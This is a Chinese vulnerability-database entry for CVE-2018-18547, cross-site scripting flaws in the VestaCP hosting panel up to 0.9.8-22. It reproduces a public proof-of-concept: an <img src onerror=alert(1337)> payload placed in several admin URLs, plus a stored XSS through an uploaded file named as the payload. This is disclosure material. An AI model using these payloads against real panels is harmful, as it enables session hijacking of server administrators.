VestaCP 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1362211 漏洞类型 跨站脚本
发布时间 2018-10-21 更新时间 2018-10-25
CVE编号 CVE-2018-18547 CNNVD-ID CNNVD-201810-1128
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018100179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1128
|漏洞详情
VestaCP是一款主机控制面板。 VestaCP 0.9.8-22及之前版本中存在跨站脚本漏洞。远程攻击者可通过多种方法利用该漏洞在用户浏览器中执行JavaScript代码。
|漏洞EXP
[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:

Insert any XSS payload. I will use <img src onerror=alert(1337)>

https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file as named xss payload, using any form in your website.
If VestaCP user see this file in the interface, his browser will run the JavaScript.
So this vulnerability makes high risk.

https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS

// for secure days...
|参考资料

来源:packetstormsecurity.com

链接:http://packetstormsecurity.com/files/149897/VestaCP-0.9.8-22-Cross-Site-Scripting.html